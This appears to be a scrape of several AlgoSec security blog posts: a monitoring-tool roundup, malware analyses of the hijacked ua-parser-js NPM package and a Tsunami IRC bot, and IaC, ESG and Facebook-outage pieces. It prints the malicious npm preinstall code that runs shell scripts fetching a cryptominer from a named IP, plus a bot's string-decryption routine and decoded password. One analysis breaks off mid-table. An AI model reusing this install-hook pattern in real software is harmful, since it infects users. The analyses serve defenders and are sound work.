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What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for... Network Security Top 9 Network Security Monitoring Tools for Identifying Potential Threats Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/4/24 Published What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for signs of security issues. These signs can provide IT teams with valuable information about the organization’s cybersecurity posture. For example, security teams may notice unusual changes being made to access control policies. This may lead to unexpected traffic flows between on-premises systems and unrecognized web applications. This might provide early warning of an active cyberattack, giving security teams enough time to conduct remediation efforts and prevent data loss . Detecting this kind of suspicious activity without the visibility that network security monitoring provides would be very difficult. These tools and policies enhance operational security by enabling network intrusion detection, anomaly detection, and signature-based detection. Full-featured network security monitoring solutions help organizations meet regulatory compliance requirements by maintaining records of network activity and security incidents. This gives analysts valuable data for conducting investigations into security events and connect seemingly unrelated incidents into a coherent timeline. What To Evaluate in a Network Monitoring Software Provider Your network monitoring software provider should offer a comprehensive set of features for collecting, analyzing, and responding to suspicious activity anywhere on your network. It should unify management and control of your organization’s IT assets while providing unlimited visibility into how they interact with one another. Comprehensive alerting and reporting Your network monitoring solution must notify you of security incidents and provide detailed reports describing those incidents in real-time. It should include multiple toolsets for collecting performance metrics, conducting in-depth analysis, and generating compliance reports. Future-proof scalability Consider what kind of network monitoring needs your organization might have several years from now. If your monitoring tool cannot scale to accommodate that growth, you may end up locked into a vendor agreement that doesn’t align with your interests. This is especially true with vendors that prioritize on-premises implementations since you run the risk of paying for equipment and services that you don’t actually use. Cloud-delivered software solutions often perform better in use cases where flexibility is important. Integration with your existing IT infrastructure Your existing security tech stack may include a selection of SIEM platforms, IDS/IPS systems, firewalls , and endpoint security solutions. Your network security monitoring software will need to connect all of these tools and platforms together in order to grant visibility into network traffic flows between them. Misconfigurations and improper integrations can result in dangerous security vulnerabilities. A high-performance vulnerability scanning solution may be able to detect these misconfigurations so you can fix them proactively. Intuitive user experience for security teams and IT admins Complex tools often come with complex management requirements. This can create a production bottleneck when there aren’t enough fully-trained analysts on the IT security team. Monitoring tools designed for ease of use can improve security performance by reducing training costs and allowing team members to access monitoring insights more easily. Highly automated tools can drive even greater performance benefits by reducing the need for manual control altogether. Excellent support and documentation Deploying network security monitoring tools is not always a straightforward task. Most organizations will need to rely on expert support to assist with implementation, troubleshooting, and ongoing maintenance. Some vendors provide better technical support to customers than others, and this difference is often reflected in the price. Some organizations work with managed service providers who can offset some of their support and documentation needs by providing on-demand expertise when needed. Pricing structures that work for you Different vendors have different pricing structures. When comparing network monitoring tools, consider the total cost of ownership including licensing fees, hardware requirements, and any additional costs for support or updates. Certain usage models will fit your organization’s needs better than others, and you’ll have to document them carefully to avoid overpaying. Compliance and reporting capabilities If you plan on meeting compliance requirements for your organization, you will need a network security monitoring tool that can generate the necessary reports and logs to meet these standards. Every set of standards is different, but many reputable vendors offer solutions for meeting specific compliance criteria. Find out if your network security monitoring vendor supports compliance standards like PCI DSS, HIPAA, and NIST. A good reputation for customer success Research the reputation and track record of every vendor you could potentially work with. Every vendor will tell you that they are the best – ask for evidence to back up their claims. Vendors with high renewal rates are much more likely to provide you with valuable security technology than lower-priced competitors with a significant amount of customer churn. Pay close attention to reviews and testimonials from independent, trustworthy sources. Compatibility with network infrastructure Your network security monitoring tool must be compatible with the entirety of your network infrastructure. At the most basic level, it must integrate with your hardware fleet of routers, switches, and endpoint devices. If you use devices with non-compatible operating systems, you risk introducing blind spots into your security posture. For the best results, you must enjoy in-depth observability for every hardware and software asset in your network, from the physical layer to the application layer. Regular updates and maintenance Updates are essential to keep security tools effective against evolving threats. Check the update frequency of any monitoring tool you consider implementing and look for the specific security vulnerabilities addressed in those updates. If there is a significant delay between the public announcement of new vulnerabilities and the corresponding security patch, your monitoring tools may be vulnerable during that period of time. 9 Best Network Security Monitoring Providers for Identifying Cybersecurity Threats 1. AlgoSec AlgoSec is a network security policy management solution that helps organizations automate and orchestrate network security policies. It keeps firewall rules , routers, and other security devices configured correctly, ensuring network assets are secured properly. AlgoSec protects organizations from misconfigurations that can lead to malware, ransomware, and phishing attacks, and gives security teams the ability to proactively simulate changes to their IT infrastructure. 2. SolarWinds SolarWinds offers a range of network management and monitoring solutions, including network security monitoring tools that detect changes to security policies and traffic flows. It provides tools for network visibility and helps identify and respond to security incidents. However, SolarWinds can be difficult for some organizations to deploy because customers must purchase additional on-premises hardware. 3. Security Onion Security Onion is an open-source Linux distribution designed for network security monitoring. It integrates multiple monitoring tools like Snort, Suricata, Bro, and others into a single platform, making it easier to set up and manage a comprehensive network security monitoring solution. As an open-source option, it is one of the most cost-effective solutions available on the market, but may require additional development resources to customize effectively for your organization’s needs. 4. ELK Stack Elastic ELK Stack is a combination of three open-source tools: Elasticsearch, Logstash, and Kibana. It’s commonly used for log data and event analysis. You can use it to centralize logs, perform real-time analysis, and create dashboards for network security monitoring. The toolset provides high-quality correlation through large data sets and provides security teams with significant opportunities to improve security and network performance using automation. 5. Cisco Stealthwatch Cisco Stealthwatch is a commercial network traffic analysis and monitoring solution. It uses NetFlow and other data sources to detect and respond to security threats, monitor network behavior, and provide visibility into your network traffic. It’s a highly effective solution for conducting network traffic analysis, allowing security analysts to identify threats that have infiltrated network assets before they get a chance to do serious damage. 6. Wireshark Wireshark is a widely-used open-source packet analyzer that allows you to capture and analyze network traffic in real-time. It can help you identify and troubleshoot network issues and is a valuable tool for security analysts. Unlike other entries on this list, it is not a fully-featured monitoring platform that collects and analyzes data at scale – it focuses on providing deep visibility into specific data flows one at a time. 7. Snort Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that can monitor network traffic for signs of suspicious or malicious activity. It’s highly customizable and has a large community of users and contributors. It supports customized rulesets and is easy to use. Snort is widely compatible with other security technologies, allowing users to feed signature updates and add logging capabilities to its basic functionality very easily. However, it’s an older technology that doesn’t natively support some modern features users will expect it to. 8. Suricata Suricata is another open-source IDS/IPS tool that can analyze network traffic for threats. It offers high-performance features and supports rules compatible with Snort, making it a good alternative. Suricata was developed more recently than Snort, which means it supports modern workflow features like multithreading and file extraction. Unlike Snort, Suricata supports application-layer detection rules and can identify traffic on non-standard ports based on the traffic protocol. 9. Zeek (formerly Bro) Zeek is an open-source network analysis framework that focuses on providing detailed insights into network activity. It can help you detect and analyze potential security incidents and is often used alongside other NSM tools. This tool helps security analysts categorize and model network traffic by protocol, making it easier to inspect large volumes of data. Like Suricata, it runs on the application layer and can differentiate between protocols. Essential Network Monitoring Features Traffic Analysis The ability to capture, analyze, and decode network traffic in real-time is a basic functionality all network security monitoring tools should share. Ideally, it should also include support for various network protocols and allow users to categorize traffic based on those categories. Alerts and Notifications Reliable alerts and notifications for suspicious network activity, enabling timely response to security threats. To avoid overwhelming analysts with data and contributing to alert fatigue, these notifications should consolidate data with other tools in your security tech stack. Log Management Your network monitoring tool should contribute to centralized log management through network devices, apps, and security sensors for easy correlation and analysis. This is best achieved by integrating a SIEM platform into your tech stack, but you may not wish to store all of your network’s logs on the SIEM, because of the added expense. Threat Detection Unlike regular network traffic monitoring, network security monitoring focuses on indicators of compromise in network activity. Your tool should utilize a combination of signature-based detection, anomaly detection, and behavioral analysis to identify potential security threats. Incident Response Support Your network monitoring solution should facilitate the investigation of security incidents by providing contextual information, historical data, and forensic capabilities. It may correlate detected security events so that analysts can conduct investigations more rapidly, and improve security outcomes by reducing false positives. Network Visibility Best-in-class network security monitoring tools offer insights into network traffic patterns, device interactions, and potential blind spots to enhance network monitoring and troubleshooting. To do this, they must connect with every asset on the network and successfully observe data transfers between assets. Integration No single security tool can be trusted to do everything on its own. Your network security monitoring platform must integrate with other security solutions, such as firewalls, intrusion detection/prevention systems (IDS/IPS), and SIEM platforms to create a comprehensive security ecosystem. If one tool fails to detect malicious activity, another may succeed. Customization No two organizations are the same. The best network monitoring solutions allow users to customize rules, alerts, and policies to align with specific security requirements and network environments. These customizations help security teams reduce alert fatigue and focus their efforts on the most important data traffic flows on the network. Advanced Features for Identifying Vulnerabilities & Weaknesses Threat Intelligence Integration Threat intelligence feeds enhance threat detection and response capabilities by providing in-depth information about the tactics, techniques, and procedures used by threat actors. These feeds update constantly to reflect the latest information on cybercriminal activities so analysts always have the latest data. Forensic Capabilities Detailed data and forensic tools provide in-depth analysis of security breaches and related incidents, allowing analysts to attribute attacks to hackers and discover the extent of cyberattacks. With retroactive forensics, investigators can include historical network data and look for evidence of compromise in the past. Automated Response Automated responses to security threats can isolate affected devices or modify firewall rules the moment malicious behavior is detected. Automated detection and response workflows must be carefully configured to avoid business disruptions stemming from misconfigured algorithms repeatedly denying legitimate traffic. Application-level Visibility Some network security monitoring tools can identify and classify network traffic by applications and services , enabling granular control and monitoring. This makes it easier for analysts to categorize traffic based on its protocol, which can streamline investigations into attacks that take place on the application layer. Cloud and Virtual Network Support Cloud-enabled organizations need monitoring capabilities that support cloud environments and virtualized networks. Without visibility into these parts of the hybrid network, security vulnerabilities may go unnoticed. Cloud-native network monitoring tools must include data on public and private cloud instances as well as containerized assets. Machine Learning and AI Advanced machine learning and artificial intelligence algorithms can improve threat detection accuracy and reduce false positives. These features often work by examining large-scale network traffic data and identifying patterns within the dataset. Different vendors have different AI models and varying levels of competence with emerging AI technology. User and Entity Behavior Analytics (UEBA) UEBA platforms monitor asset behaviors to detect insider threats and compromised accounts. This advanced feature allows analysts to assign dynamic risk scores to authenticated users and assets, triggering alerts when their activities deviate too far from their established routine. Threat Hunting Tools Network monitoring tools can provide extra features and workflows for proactive threat hunting and security analysis. These tools may match observed behaviors with known indicators of compromise, or match observed traffic patterns with the tactics, techniques, and procedures of known threat actors. AlgoSec: The Preferred Network Security Monitoring Solution AlgoSec has earned an impressive reputation for its network security policy management capabilities. The platform empowers security analysts and IT administrators to manage and optimize network security policies effectively. It includes comprehensive firewall policy and change management capabilities along with comprehensive solutions for automating application connectivity across the hybrid network. Here are some reasons why IT leaders choose AlgoSec as their preferred network security policy management solution: Policy Optimsization: AlgoSec can analyze firewall rules and network security policies to identify redundant or conflicting rules, helping organizations optimize their security posture and improve rule efficiency. Change Management: It offers tools for tracking and managing changes to firewall and network data policies, ensuring that changes are made in a controlled and compliant manner. Risk Assessment: AlgoSec can assess the potential security risks associated with firewall rule changes before they are implemented, helping organizations make informed decisions. Compliance Reporting: It provides reports and dashboards to assist with compliance audits, making it easier to demonstrate regulatory compliance to regulators. Automation: AlgoSec offers automation capabilities to streamline policy management tasks, reducing the risk of human error and improving operational efficiency. Visibility: It provides visibility into network traffic and policy changes, helping security teams monitor and respond to potential security incidents. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

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As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" , (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, Prevasio found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

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In our previous post we have provided some details about a new fork of Kinsing malware, a Linux malware that propagates across... Cloud Security Router Honeypot for an IRC Bot Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. glibc_2 Tags Share this article 9/13/20 Published In our previous post we have provided some details about a new fork of Kinsing malware, a Linux malware that propagates across misconfigured Docker platforms and compromises them with a coinminer. Several days ago, the attackers behind this malware have uploaded a new ELF executable b_armv7l into the compromised server dockerupdate[.]anondns[.]net . The executable b_armv7l is based on a known source of Tsunami (also known as Kaiten), and is built using uClibc toolchain: $ file b_armv7l b_armv7l: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, with debug_info, not stripped Unlike glibc , the C library normally used with Linux distributions, uClibc is smaller and is designed for embedded Linux systems, such as IoT. Therefore, the malicious b_armv7l was built with a clear intention to install it on such devices as routers, firewalls, gateways, network cameras, NAS servers, etc. Some of the binary’s strings are encrypted. With the help of the HexRays decompiler , one could clearly see how they are decrypted: memcpy ( &key, "xm@_;w,B-Z*j?nvE|sq1o$3\"7zKC4ihgfe6cba~&5Dk2d!8+9Uy:" , 0x40u ) ; memcpy ( &alphabet, "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. " , 0x40u ) ; for ( i = 0; i < = 64; ++i ){ if ( encoded [ j ] == key [ i ]) { if ( psw_or_srv ) decodedpsw [ k ] = alphabet [ i ] ; else decodedsrv [ k ] = alphabet [ i ] ; ++k; }} The string decryption routine is trivial — it simply replaces each encrypted string’s character found in the array key with a character at the same position, located in the array alphabet. Using this trick, the critical strings can be decrypted as: Variable Name Encoded String Decoded String decodedpsw $7|3vfaa~8 logmeINNOW decodedsrv $7?*$s7

Anat Kleinmann, AlgoSec Sr. Product Manager and IaC expert, discusses how incorporating Infrastructure-as-Code into DevSecOps can allow... Risk Management and Vulnerabilities Bridging the DevSecOps Application Connectivity Disconnect via IaC Anat Kleinmann 2 min read Anat Kleinmann Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/7/22 Published Anat Kleinmann, AlgoSec Sr. Product Manager and IaC expert, discusses how incorporating Infrastructure-as-Code into DevSecOps can allow teams to take a preventive approach to secure application connectivity . With customer demands changing at breakneck speed, organizations need to be agile to win in their digital markets. This requires fast and frequent application deployments, forcing DevOps teams to streamline their software development processes. However, without the right security tools placed in the early phase of the CI/CD pipeline, these processes can be counterproductive leading to costly human errors and prolonged application deployment backups. This is why organizations need to find the right preventive security approach and explore achieving this through Infrastructure-as-Code. Understanding Infrastructure as Code – what does it actually mean? Infrastructure-as-Code (Iac) is a software development method that describes the complete environment in which the software runs. It contains information about the hardware, networks, and software that are needed to run the application. IAC is also referred to as declarative provisioning or automated provisioning. In other words, IAC enables security teams to create an automated and repeatable process to build out an entire environment. This is helpful for eliminating human errors that can be associated with manual configuration. The purpose of IaC is to enable developers or operations teams to automatically manage, monitor and provision resources, rather than manually configure discrete hardware devices and operating systems. What does IaC mean in the context of running applications in a cloud environment When using IaC, network configuration files can contain your applications connectivity infrastructure connectivity specifications changes, which mkes it easier to edit, review and distribute. It also ensures that you provision the same environment every time and minimizes the downtime that can occur due to security breaches. Using Infrastructure as code (IaC) helps you to avoid undocumented, ad-hoc configuration changes and allows you to enforce security policies in advance before making the changes in your network. Top 5 challenges when not embracing a preventive security approach Counterintuitive communication channel – When reviewing the code manually, DevOps needs to provide access to a security manager to review it and rely on the security manager for feedback. This can create a lot of unnecessary back and forth communication between the teams which can be a highly counterintuitive process. Mismanagement of DevOps resources – Developers need to work on multiple platforms due to the nature of their work. This may include developing the code in one platform, checking the code in another, testing the code in a third platform and reviewing requests in a fourth platform. When this happens, developers often will not be alerted of any network risk or non-compliance issue as defined by the organization. Mismanagement of SecOps resources – At the same time, network security managers are also bombarded with security review requests and tasks. Yet, they are expected to be agile, which is impossible in case of manual risk detection. Inefficient workflow – Sometimes risk analysis process is skipped and only reviewed at the end of the CI/CD pipeline, which prolongs the delivery of the application. Time consuming review process – The risk analysis review itself can sometimes take more than 30 minutes long which can create unnecessary and costly bottlenecking, leading to missed rollout deadlines of critical applications Why it’s important to place security early in the development cycle Infrastructure-as-code (IaC) is a crucial part of DevSecOps practices. The current trend is based on the principle of shift-left, which places security early in the development cycle. This allows organizations to take a proactive, preventive approach rather than a reactive one. This approach solves the problem of developers leaving security checks and testing for the later stages of a project often as it nears completion and deployment. It is critical to take a proactive approach since late-stage security checks lead to two critical problems. Security flaws can go undetected and make it into the released software, and security issues detected at the end of the software development lifecycle demand considerably more time, resources and money to remediate than those identified early on. The Power of IaC Connectivity Risk Analysis and Key Benefits IaC connectivity risk analysis provides automatic and proactive connectivity risk analysis, enabling a frictionless workflow for DevOps with continuous customized risk analysis and remediation managed and controlled by the security managers. IaC Connectivity Risk Analysis enables organizations to use a single source of truth for managing the lifecycle of their applications. Furthermore, security engineers can use IaC to automate the design, deployment, and management of virtual assets across a hybrid cloud environment. With automated security tests, engineers can also continuously test their infrastructure for security issues early in the development phase. Key benefits Deliver business applications into production faster and more securely Enable a frictionless workflow with continuous risk analysis and remediation Reduce connectivity risks earlier in the CI/CD process Customizable risk policy to surface only the most critical risks The Takeaway Don’t get bogged down by security and compliance. When taking a preventive approach using a connectivity risk analysis via IaC, you can increase the speed of deployment, reduce misconfiguration and compliance errors, improve DevOps – SecOps relationship and lower costs Next Steps Let AlgoSec’s IaC Connectivity Risk Analysis can help you take a proactive, preventive security approach to get DevOps’ workflow early in the game, automatically identifying connectivity risks and providing ways to remediate them. Watch this video or visit us at GitHub to learn how. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Learn how ESG principles are driving sustainable environmental strategies Discover how companies integrate ESG to reduce footprint and contribute to a greener future Our environmental strategy Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue Environmental commitment and vision AlgoSec recognizes the importance of protecting the environment, we at AlgoSec are committed to reducing our carbon footprint and our waste by efficiently coding our product. For minimal environmental impact, the company has defined a long-term strategy, which includes working towards reinforcing its reduction goals and strengthening them through information and employee awareness. Our goal AlgoSec is determined to reduce our environmental impact, by striving to decrease the GHG emissions from our worldwide operations and from our products (as applicable), thus ensuring a safer and more sustainable future for us all. We are continuously looking for ways to maximize energy efficiency while minimizing water consumption and waste accumulation throughout our operations. Our next steps We are committed to infusing as part of our business plan strategic actions to advance reduction in GHG emissions, as part of Scope 1&2. We will continue to reduce our environmental impact by monitoring our progress and taking strategic actions to help achieve our goals. What we have achieved so far Implementation of a worldwide hybrid model since 2020, thus inducing a reduction in emissions spent on employee commuting, as well as electricity usage and water consumption. Waste management program – Reduce trash and the use of plastic at the office, in addition to recycling or reusing 99% of our electronic waste Raising employee awareness of effective use of energy in the office Product sustainability – we strive to increase the energy efficiency of our products by advanced product coding. Certification Verification Statement for GHG Scope 1&2: Additional related links: AA1000AS Reports | Accountability Global Sustainability Consultancy and Standards New York, London, Dubai, Riyadh BDO has conducted the assurance for AlgoSec Greenhouse Gas inventory for scopes 1 and 2 according to GHG protocola The assurance procedure was done according to the disclosures required by the AccountAbility AA1000AS v3 standard and the ISO 14064-3 verification methodology. The assurance process was conducted professionally, impartially and independently.

Avishai Wool, CTO at AlgoSec, analyses the recent Facebook outage and the risks all organizations face in network configuration Social... Cyber Attacks & Incident Response The Facebook outage and network configuration Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/6/21 Published Avishai Wool, CTO at AlgoSec, analyses the recent Facebook outage and the risks all organizations face in network configuration Social media giant Facebook was involved in a network outage on the 4th October 2021 that lasted for nearly six hours and took its sister platforms Instagram and WhatsApp offline. As the story developed, it became apparent that the incident was caused by a configuration issue within Facebook’s BGP (Border Gateway Protocol), one of the systems that the internet uses to get your traffic where it needs to go as quickly as possible. The outage also cut off the company’s internal communications, along with authentication to third-party services including Google and Zoom. Some reports suggested security passes went offline, which stopped engineers from entering the building to physically reset the data center. The impact was felt worldwide, with Downdetector recording more than 10 million problem reports, the largest number for one single incident. Facebook released an official statement following the outage stating: “Our engineering teams learned that configuration changes on the backbone routers that coordinate network traffic between our data centers caused issues that interrupted this communication.” While Facebook has assured its users that no data has been lost in this process, the outage is a stark reminder of how small configuration errors can have huge, far-reaching consequences. The fundamentals of application availability At the fundamental level, Facebook suffered from a lack of application availability. When a change was actioned, it caused a major chain reaction that ultimately wiped Facebook and its related services from the internet because they couldn’t see the entire lifecycle of that change and the impact it would have. To avoid an incident like this in the future, organizations should consider a few simple steps: Back up configuration files to allow for rollbacks should an issue arise Use a test system alongside live processes to run scenarios without causing any disruptions Retain low-tech alternatives to guarantee access to the network if the primary route fails The outages across Facebook’s infrastructure highlight the operational risks all organizations face around faulty configuration changes which can drastically impact application availability. Intelligent automation, thorough change management and proactive checks are key to avoid these outages. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call